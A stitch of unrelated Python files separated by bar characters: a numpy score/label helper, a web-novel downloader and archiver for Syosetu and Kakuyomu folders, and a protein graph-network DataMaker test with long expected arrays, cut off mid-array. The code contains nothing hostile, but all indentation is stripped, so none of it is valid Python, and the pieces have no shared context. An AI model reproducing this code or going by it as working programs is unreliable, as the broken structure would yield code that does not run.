parser = argopt(__doc__).parse_args()
datasets_folder = Path(parser.datasets_folder)
output_snippet_folder = Path(parser.output_snippet_folder)
main_csv_file = Path(parser.main_csv_file)
main(datasets_folder=datasets_folder, output_folder=output_snippet_folder,
main_csv_file=main_csv_file)
|
import numpy as np
"""
some really utils functions
"""
def get_score_label_array_from_dict(score_dict, label_dict):
"""
:param score_dict: defaultdict(list)
:param label_dict: defaultdict(list)
:return: np array with score and label
"""
assert len(score_dict) == len(label_dict), "The score_dict and label_dict don't match"
score = np.ones(len(score_dict))
label = np.ones(len(label_dict))
for idx, (key, score_l) in enumerate(score_dict.items()):
label[idx] = max(label_dict[key])
score[idx] = max(score_l)
return score, label |
import os
from src.Downloaders import *
def archiveUpdate(dirList=[],keep_text_format=False):
if not dirList:
dirList=os.listdir('./novel_list')
print("list=")
print(dirList)
for novel_folder in dirList:
print()
novelInfo=getNovelInfoFromFolderName(novel_folder)
#change the fetching process following the site it's hosted on
novel=Novel(novelInfo[1],novelInfo[0],keep_text_format)
novel=novel.updateObject()
if(novel==0):
print(novel_folder+' couldnt be updated because the code doesnt match known formats')
continue
#now we fetch the local chapters and determine the last chapter stored
chapter_list=os.listdir('./novel_list/%s'%novel_folder)
last_downloaded=0
for chap in chapter_list:
n=chap.find('_')
tmp=chap[:n]
tmp=int(tmp)
if(last_downloaded<tmp):
last_downloaded=tmp
novel.setLastChapter(last_downloaded)
#now that we have the number of the last chapter and the novel code
#let's update the archive
novel.setDir('./novel_list/'+novel_folder)
novel.processNovel()
def archiveFullUpdate(dirList=[],force=False):
if not dirList:
dirList=os.listdir('./novel_list')
for novel_folder in dirList:
print()
NFs=getNovelInfoFromFolderName(novel_folder)
novel_name=NFs[0] #novel_folder[code:]
code=NFs[1] #novel_folder[:code]
#here we got the novel code and our folder name
#we adapt the fetching process behaviour following the site it's hosted on
novel=Novel(code,novel_name)
novel=novel.updateObject()
if(novel==0):
print(novel_folder+' couldnt be updated')
continue
#now we fetch the local chapters and get the last chapter stored
chapter_list=os.listdir('./novel_list/%s'%novel_folder)
novel.setDir('./novel_list/'+code+novel_name)
last_downloaded=0
code_list=[]
for nov in chapter_list:
chapter_code=nov.find('_')
chapter_code=nov[:chapter_code]
code_list.append(chapter_code)
if(int(last_downloaded)<int(chapter_code)):
last_downloaded=chapter_code
print(last_downloaded)
print(code_list)
for i in range(0,int(last_downloaded)):
if '%s'%i not in code_list or force==True:
print('no '+str(i))
if int(i) == 0 and isinstance(novel,SyosetuNovel) :
novel.processTocResume()
continue
elif isinstance(novel,SyosetuNovel) :
novel.setLastChapter(int(i)) #work around cause conception is shit
chap=int(i)
novel.processChapter(chap)
continue
#TODO:
elif isinstance(novel,KakuyomuNovel):
novel.setLastChapter(last_downloaded)
novel.setDir('./novel_list/'+novel_folder)
novel.processNovel()
novel.setLastChapter(int(last_downloaded))
#now that we have the number of the last chapter and the novel code
#let's update the archive
novel.processNovel()
#return code and novel name from input.txt
def getInputFile():
inputfile=open('input.txt','r+', encoding='utf-8')
line=inputfile.readline()
novel_list=[]
while line:
print("{}".format(line.strip()))
separator=line.find(';')
code=line[:separator]
novel_name=line[separator+1:] #delete carriage return
novel_name=novel_name.strip()
novel_list.append([code,novel_name])
line = inputfile.readline()
inputfile.close()
return novel_list
#return code and novel name from novel folder
def getNovelInfoFromFolderName(folderName):
code= folderName.find(' ')
novel_name= folderName[code+1:].strip()
code= folderName[:code]
return [novel_name,code]
def download(keep_text_format=False):
if('novel_list' not in os.listdir('.')):
os.mkdir('novel_list')
novel_list=getInputFile()
for novel_info in novel_list:
code=novel_info[0]
if code=='':
continue
name=novel_info[1]
#print('i '+name)
print(keep_text_format)
novel=Novel(code,name,keep_text_format)
novel=novel.updateObject()
if(novel==0):
continue
#detect if the novel has already been downloaded
match=findNovel(code)
if (len(match)>0):
print(match[0][:25]+'... \t folder already exists')
continue
dir=''
if (name==''):
dir='./novel_list/'
name=novel.getNovelTitle()
name=checkTitle(name)
print(name)
dir+=code+' '+name
print(dir)
else:
name=checkTitle(name)
dir='./novel_list/'+code+' '+name
if code+' '+name not in match:
try :
os.mkdir('%s'%dir)
except FileExistsError:
print("the folder already exists")
continue
else:
print(code+' '+name+' folder already imported, update to fetch updates')
continue
print("dir= "+dir)
#dir='./novel_list/'+code+' '+name
novel.setDir(dir)
novel.setLastChapter(0)
novel.processNovel()
#register as csv every folder name and the number of chapter
def getFolderStatus():
dir='./novel_list'
statusList=[]
for novel_folder in os.listdir(dir):
code=novel_folder.find(' ')
if code==-1:
print(code)
continue
novel_name=novel_folder[code:]
code=novel_folder[:code]
lastchap=0
for file in os.listdir(dir+'/'+novel_folder):
chapnum=file.find('_')
chapnum=int(file[:chapnum])
if(chapnum>lastchap):
lastchap=chapnum
statusList.append([code,lastchap,novel_name])
print('%s %s %s'%(code,lastchap,novel_name))
enterInCSV(dir+'/status.csv',statusList)
#overwrite the file with tab content
def enterInCSV(filename,tab):
file = open(filename, 'w+', encoding='utf-8')
for line in tab:
file.write('%1s %1s %2s\n'%(line[0],line[1],line[2]))
file.close()
def compressNovelDirectory(novelDirectory,outputDir):
import zipfile
novelname=novelDirectory[novelDirectory.rfind('/')+1:]
outputZipName=outputDir+'/'+novelname+'.zip'
zipf = zipfile.ZipFile(outputZipName, 'w', zipfile.ZIP_DEFLATED)
for tab in os.walk(novelDirectory):
for file in tab[2]:
zipf.write(os.path.join(tab[0], file))
print()
zipf.close()
#compress in zip format every novel folder found
def compressAll(regex='',outputDir=''):
if (outputDir==''):
dirlist=os.listdir('./')
print(dirlist)
outputDir='./zip'
if 'zip' not in dirlist :
os.mkdir('zip')
dir='./novel_list'
DirToCompress=[]
for novel_folder in os.listdir(dir):
if novel_folder.find(regex)!=-1:
DirToCompress.append(novel_folder)
for subdir in DirToCompress:
print('done at '+str(DirToCompress.index(subdir))+' on '+str(len(DirToCompress)))
if(subdir.find('.')==-1):
compressNovelDirectory(dir+'/'+subdir,outputDir)
return(DirToCompress)
#find in the novels folder every regex match
def findNovel(regex,dir='./novel_list'):
import re
liste=[]
regex= re.compile(regex)
novel_folders=os.listdir(dir)
liste=list(filter(regex.match, novel_folders))
return liste
|
from menten_gcn import DataMaker
import menten_gcn.decorators as decs
import numpy as np
class Maguire_Grattarola_2021(DataMaker):
def __init__(self):
decorators = [decs.Sequence(), decs.CACA_dist(), decs.PhiPsiRadians(),
decs.ChiAngleDecorator(), decs.trRosettaEdges(),
decs.SequenceSeparation(), decs.RosettaJumpDecorator(rottype="euler"),
decs.RosettaHBondDecorator(),
decs.AbbreviatedRef2015Decorator_v0()]
DataMaker.__init__(self, decorators=decorators,
edge_distance_cutoff_A=15.0,
max_residues=30,
exclude_bbdec=False,
nbr_distance_cutoff_A=100,
dtype=np.float32)
def run_consistency_check(self):
N, F, S = self.get_N_F_S()
print(N, F, S)
assert N == 30
assert F == 46
assert S == 28
try:
from pyrosetta import pose_from_sequence
from menten_gcn import RosettaPoseWrapper
pose = pose_from_sequence("MENTENAI")
wrapped_pose = RosettaPoseWrapper(pose)
X, A, E, meta = self.generate_input_for_resid(wrapped_pose, 1)
def test(A, B):
np.testing.assert_array_equal(A, B, 3)
'''
import sys
np.set_printoptions(threshold=sys.maxsize)
print( repr( X ) )
print( repr( A ) )
print( repr( E ) )
print( repr( meta ) )
'''
test(meta, [1, 2, 3, 4, 5, 6, 7, 8])
expected_X = np.array([[1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 1.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 8.3775802e-07,
1.0000000e+00, 5.2359877e-07, 1.0000000e+00, -5.7595867e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.8672367e+03, 9.1478378e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.2645603e+01, 0.0000000e+00, 0.0000000e+00,
1.6573499e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.2689281e-07,
1.0000000e+00, -5.2359876e-08, 1.0000000e+00, -1.3962634e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 5.3682019e+02, 2.2368712e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.9272125e+01, 1.9425745e+00, 0.0000000e+00,
-2.7245300e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 6.6141240e-16,
1.0000000e+00, -1.2602073e-15, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.0468760e+01, 3.8885200e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 2.6608192e+01, 6.7491651e-01, 0.0000000e+00,
-1.3402600e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 1.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -1.3439035e-06,
1.0000000e+00, 5.9341193e-07, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.5641568e+00, 4.0509410e-02,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 5.9773567e+01, 1.7684269e+00, 0.0000000e+00,
1.1517500e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.2689281e-07,
1.0000000e+00, -5.2359876e-08, 1.0000000e+00, -1.3962634e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 5.3682019e+02, 2.2368712e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.9272125e+01, 1.9425745e+00, 0.0000000e+00,
-2.7245300e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.7057779e-16,
1.0000000e+00, 3.2313005e-16, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.0468760e+01, 3.8885200e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.4736256e+01, 6.7491651e-01, 0.0000000e+00,
-1.3402600e+00, 0.0000000e+00],
[0.0000000e+00, 1.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.5678021e-01, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 0.0000000e+00, 7.2029513e-01, 0.0000000e+00,
1.3246800e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 1.9198622e-07,
1.0000000e+00, 1.1344640e-06, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.9560727e+02, 3.5983735e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 6.2573467e+01, 0.0000000e+00, 0.0000000e+00,
2.3037400e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
